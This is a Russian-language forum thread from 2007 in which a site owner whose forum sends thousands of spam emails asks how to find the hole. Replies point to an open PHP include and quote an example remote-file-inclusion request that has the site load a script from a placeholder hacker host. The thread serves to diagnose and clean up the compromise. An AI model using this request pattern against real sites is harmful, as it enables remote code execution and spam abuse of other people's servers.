Перейти к контенту

Меня взломали...

Рекомендуемые сообщения

Добрый день. (с Днем Победы!)

У меня такой вопрос: на моем форуме какой-то спам-бот все время рассылает ~5000 писем в сутки, из-за чего мой хостинг-аккаунт блокируется. Что делать? Каким образом найти и убрать эту дыру?

Вы уверены что бот?

Может быть у Вас где-то открытый инклайд сидит? Поищите, нет ли где-то кода

include $input

Имя переменной может быть другим...

Или бот рассылает по кнопочкам мейла пользователей средствами форума?

Тогда срочно выставить в админке жесткие лимиты отправки сообщений на мейл, и затем разбираться с защитой отботов.

Взломать можно всё что угодно :D Труднее всего статическую HTML-страницу :)

на моем форуме какой-то спам-бот все время рассылает ~5000 писем в сутки, из-за чего мой хостинг-аккаунт блокируется.

Действительно, если сделать upload зловредного скрипта, путем взлома, то такое возможно. Попроси провайдера выслать логи времени отправки писем и сравни их с временем доступа пользователей (зарегистрированных). Если время отправки совпадает с доступом всех пользователей, то вероятно реализовано через include если выявлен один - разбор полетов с ним ;)

Выход один - реализовать самоконтроль компонентов (скриптов). Могу взяться за работу, но за вознаграждение :)

Рассылка идет вот таким вот образом:

...
2007-05-09 07:21:01	 1Hlcjc-0003Oy-1		 wstat@best5.hostsila.com		79272376559@sms.mgsm.ru 508
2007-05-09 07:21:01	 1Hlcj6-00039g-U		 wstat@best5.hostsila.com		79270849844@sms.mgsm.ru 508
2007-05-09 07:21:00	 1HlcjW-0003La-8		 wstat@best5.hostsila.com		79270849844@sms.mgsm.ru 508
2007-05-09 07:21:00	 1HlcjJ-0003Ex-T		 wstat@best5.hostsila.com		79270849844@sms.mgsm.ru 508
2007-05-09 07:21:00	 1HlcjF-0003C0-5		 wstat@best5.hostsila.com		79270849844@sms.mgsm.ru 508
2007-05-09 07:21:00	 1Hlcj7-00039u-6		 wstat@best5.hostsila.com		79270849844@sms.mgsm.ru 508
...

Обратите внимание на адреса. Таких зарегистрированных пользователей у меня нет.

ЗЫ А можно как то выявить тот загруженный "зловредный скрипт"?

И еще, зайдите и посмотрите плиз как у меня регистрация устроена. wstat.com.ua

Код регистрации твой легко распознать :D

Цифр абсолютно черного цвета не должно быть, смотри сообщение выше от _Pingvin_

Обратите внимание на адреса. Таких зарегистрированных пользователей у меня нет.

Зарегистрированные пользователи никак с этим не связаны, ты можешь только их вычислить по времени доступа с логами аксесс апача.

Вобщем ставь патчи на версию своего форума и меняй код регистрации.

ЗЫ А можно как то выявить тот загруженный "зловредный скрипт"?

Можно.

Два варианта взлома:

1. Скрипт рассылки лежит у тебя на хосте. Скачай все файлы с хоста, и текстовым поиском поищи функции, использующиеся для отправки на мейл. Может быть найдешь файлы, которые ты на хост не заливал...

2. Скрипт рассылки инклайдится к твоей странице. Поищи что-то типа

<? include $inc; ?>

Хакер может делать запрос типа

хттп://твой_сайт/файл.php?inc=хттп://хакерский_сайт/хакерский_файл.php

и таким образом рассылать своим скриптом с тввоего домена.

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить в этой теме...

×   Вы вставили отформатированный текст.   Удалить форматирование

Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.